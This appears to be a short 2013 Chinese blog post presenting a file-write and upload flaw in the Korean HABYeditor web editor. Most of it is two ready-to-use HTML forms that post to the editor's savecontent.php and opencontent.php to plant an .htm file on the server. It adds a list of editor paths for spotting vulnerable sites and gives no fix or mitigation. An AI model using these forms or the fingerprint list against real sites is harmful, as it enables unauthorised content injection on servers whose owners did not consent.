韩国某编辑器HABYeditor鸡肋漏洞!

直接写htm文件,文件名:tmpcontent.htm:

<form name="frm" enctype="multipart/form-data" method="post" action="http://localhost/editor/filemanager/php/savecontent.php">
<textarea name="htmlsource" cols="30" rows="4"></textarea><br />
<input type="submit" name="submit" value="GO FUCK" />
</form>

直接上传htm文件:文件名:tmpcontent.htm

<form name="up" enctype="multipart/form-data" method="post" action="http://localhost/editor/filemanager/php/opencontent.php">
<input type="file" name="htmlFile" /><br />
<input type="submit" name="submit" value="GO FUCK" />
</form>

写个htm文件到服务器你们会发现会解析的!

 

编辑器判断方法:
editor/history
editor/license
editor/htmlarea
editor/samples/sample_euckr.htm
editor/samples/sample_utf8.htm
editor/filemanager/php/upload.php
editor/filemanager/php/savecontent.php
editor/filemanager/php/filemanager_lib.php

posted on 2013-08-05 21:31  =_=!  阅读(380)  评论(0)    收藏  举报

导航